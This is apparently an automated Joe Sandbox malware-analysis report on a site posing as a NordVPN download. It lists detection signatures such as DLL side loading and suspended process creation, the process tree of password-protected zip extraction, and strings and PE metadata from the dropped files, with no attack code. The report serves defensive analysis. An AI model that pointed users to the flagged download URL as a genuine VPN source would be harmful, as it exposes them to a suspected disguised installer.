Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://vpn-get.com/nordvpn

Overview

General Information

Sample URL:https://vpn-get.com/nordvpn
Analysis ID:756292
Infos:

Detection

Score:25
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

DLL side loading technique detected
Creates a DirectInput object (often for capturing keystrokes)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains strange resources
Drops PE files
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Creates a process in suspended mode (likely to inject code)

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample searches for specific file, try point organization specific fake files to the analysis machine
  • System is w10x64
  • chrome.exe (PID: 4664 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 3576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • unarchiver.exe (PID: 1032 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip MD5: B89F9ADB5A6E465B6EB4575913CD2687)
      • 7za.exe (PID: 5496 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • unarchiver.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip MD5: B89F9ADB5A6E465B6EB4575913CD2687)
      • 7za.exe (PID: 5664 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • chrome.exe (PID: 1248 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vpn-get.com/nordvpn MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_config_mp2v.pdb! source: mc_config_mp2v.dll.9.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.6.dr
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_dec_spic.pdb source: mc_dec_spic.dll0.6.dr
Source: Binary string: libGLESv2.dll.pdb`1-p1- source: libGLESv2.dll.6.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: instrument.dll.6.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.6.dr
Source: Binary string: C:\h\workspace\MXF_SDK\LICENSE\MOG_PAY_VERSION\label\vs100_x64\stage\bin\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.pdb source: MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll0.6.dr, MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll.6.dr
Source: Binary string: adbeape.pdb source: adbeape.dll.6.dr, adbeape.dll0.6.dr
Source: Binary string: D:\Projects\WinRAR\build\winrar32\Release\WinRAR.pdb source: WinRAR.exe.6.dr
Source: Binary string: libGLESv2.dll.pdb source: libGLESv2.dll.6.dr
Source: Binary string: C:\h\workspace\MXF_SDK_Modules\LICENSE\MOG_PAY_VERSION\label\vs100_x64\stage\bin\MXF_SDK_Modules_DataIO_1.4.22_vs10.pdb source: MXF_SDK_Modules_DataIO_1.4.22_vs10.dll.9.dr
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_config_mp2v.pdb source: mc_config_mp2v.dll.9.dr
Source: Binary string: C:\Code\BUILD\channels\Surface\Release\Surface.pdb source: Surface.dll.6.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.6.dr
Source: Binary string: C:\Code\BUILD\channels\Win32_Font\Release\Win32_Font.pdb source: Win32_Font.dll.6.dr
Source: Binary string: DL100AGM.pdb source: DL100AGM.dll0.6.dr
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/1085
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/1452
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/1452expand_integer_pow_expressionsThe
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/1512
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/1637
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/1936
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2046
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2152
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2152skip_vs_constant_register_zeroIn
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2273
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2514
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2703
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2727
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2970
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/2978
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3016
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3027
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3045
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3078
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3153
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3205
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3206
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3243
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3246
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3246allow_clear_for_robust_resource_initSome
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3452
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3498
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3502
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3623
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3624
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3625
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3729
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3859
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/3997
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4214
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4267
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4384
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4405
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4428
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4442
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/4490
Source: libGLESv2.dll.6.drString found in binary or memory: http://anglebug.com/482
Source: adbeape.dll.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: adbeape.dll.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/110263
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/308366
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/398694
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/398694ANGLE_DEFAULT_PLATFORMvulkanvulkan-nullswiftshadergld3d11nullGPU.ANGLE.Displa
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/403957
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/565179
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/642227
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/642605
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/644669
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/650547
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/672380
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/709351
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/772651
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/797243
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/809422
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/830046
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/849576
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/883276
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/927470
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/941620
Source: libGLESv2.dll.6.drString found in binary or memory: http://crbug.com/941620dont_translate_uniform_block_to_structured_bufferFails
Source: WinRAR.exe.6.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: WinRAR.exe.6.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: 7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: adbeape.dll.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: adbeape.dll.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: adbeape.dll.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: adbeape.dll.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: fxplugins.dll.6.drString found in binary or memory: http://javafx.com/
Source: fxplugins.dll.6.drString found in binary or memory: http://javafx.com/vp6decoderflvdemux
Source: WinRAR.exe.6.drString found in binary or memory: http://ocsp.comodoca.com0
Source: adbeape.dll.6.drString found in binary or memory: http://ocsp.digicert.com0H
Source: adbeape.dll.6.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://ocsp.thawte.com0
Source: adbeape.dll0.6.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.drString found in binary or memory: http://s.symcd.com06
Source: adbeape.dll0.6.drString found in binary or memory: http://s.symcd.com0_
Source: lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://s2.symcb.com0
Source: mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: lcms.dll.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://sv.symcd.com0&
Source: adbeape.dll0.6.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: adbeape.dll0.6.drString found in binary or memory: http://sw.symcd.com0
Source: adbeape.dll0.6.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, lcms.dll.6.dr, WinRAR.exe.6.dr, DL100AGM.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 7za.exe, 00000009.00000002.565370263.00000000010F2000.00000004.00000800.00020000.00000000.sdmp, DL100AGM.dll0.6.drString found in binary or memory: http://www.datalogics.com
Source: adbeape.dll.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: WinRAR.exe.6.drString found in binary or memory: http://www.rarlab.com
Source: WinRAR.exe.6.drString found in binary or memory: http://www.rarlab.com/themes.htm
Source: lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://www.symauth.com/cps0(
Source: lcms.dll.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: http://www.symauth.com/rpa00
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/1046462
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/593024
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/593024select_view_in_geometry_shaderThe
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/650547
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/650547call_clear_twiceUsing
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/655534
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/655534use_system_memory_for_constant_buffersCopying
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/705865
Source: libGLESv2.dll.6.drString found in binary or memory: https://crbug.com/710443
Source: lcms.dll.6.dr, WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: https://d.symcb.com/cps0%
Source: adbeape.dll0.6.dr, mc_config_mp2v.dll.9.dr, mc_dec_spic.dll0.6.dr, instrument.dll.6.dr, fxplugins.dll.6.drString found in binary or memory: https://d.symcb.com/rpa0
Source: adbeape.dll0.6.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: WinRAR.exe.6.dr, adbeape.dll.6.dr, adbeape.dll0.6.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: adbeape.dll.6.drString found in binary or memory: https://www.digicert.com/CPS0
Source: DL100AGM.dll0.6.drBinary or memory string: DirectDrawCreateEx
Source: setup64.dll.6.drStatic PE information: No import functions for PE file found
Source: mfc100chs.dll0.6.drStatic PE information: No import functions for PE file found
Source: mfc100cht.dll.6.drStatic PE information: No import functions for PE file found
Source: mfc100cht.dll0.6.drStatic PE information: No import functions for PE file found
Source: mfc100chs.dll.6.drStatic PE information: No import functions for PE file found
Source: DL100AGM.dll.6.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
Source: DL100AGM.dll.6.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
Source: mc_demux_dv.dll.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: mfc100chs.dll0.6.drStatic PE information: Section .rsrc
Source: mfc100cht.dll.6.drStatic PE information: Section .rsrc
Source: mfc100cht.dll0.6.drStatic PE information: Section .rsrc
Source: mfc100chs.dll.6.drStatic PE information: Section .rsrc
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vpn-get.com/nordvpn
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\5106b089-c5d4-4c97-b3c3-a943e1aca1aa.tmpJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
Source: classification engineClassification label: sus25.evad.win@43/220@0/17
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_config_mp2v.pdb! source: mc_config_mp2v.dll.9.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.6.dr
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_dec_spic.pdb source: mc_dec_spic.dll0.6.dr
Source: Binary string: libGLESv2.dll.pdb`1-p1- source: libGLESv2.dll.6.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: instrument.dll.6.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.6.dr
Source: Binary string: C:\h\workspace\MXF_SDK\LICENSE\MOG_PAY_VERSION\label\vs100_x64\stage\bin\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.pdb source: MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll0.6.dr, MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll.6.dr
Source: Binary string: adbeape.pdb source: adbeape.dll.6.dr, adbeape.dll0.6.dr
Source: Binary string: D:\Projects\WinRAR\build\winrar32\Release\WinRAR.pdb source: WinRAR.exe.6.dr
Source: Binary string: libGLESv2.dll.pdb source: libGLESv2.dll.6.dr
Source: Binary string: C:\h\workspace\MXF_SDK_Modules\LICENSE\MOG_PAY_VERSION\label\vs100_x64\stage\bin\MXF_SDK_Modules_DataIO_1.4.22_vs10.pdb source: MXF_SDK_Modules_DataIO_1.4.22_vs10.dll.9.dr
Source: Binary string: C:\ahpwc\mc\mc_adobe_sdk_dbginfo_win64_x64_release\mc_config_mp2v.pdb source: mc_config_mp2v.dll.9.dr
Source: Binary string: C:\Code\BUILD\channels\Surface\Release\Surface.pdb source: Surface.dll.6.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.6.dr
Source: Binary string: C:\Code\BUILD\channels\Win32_Font\Release\Win32_Font.pdb source: Win32_Font.dll.6.dr
Source: Binary string: DL100AGM.pdb source: DL100AGM.dll0.6.dr
Source: jfxwebkit.dll.6.drStatic PE information: section name: .unwante
Source: wget.exe.6.drStatic PE information: section name: /4
Source: wget.exe.6.drStatic PE information: section name: /14
Source: GFSDK_ShadowLib.win64.dll.6.drStatic PE information: section name: text
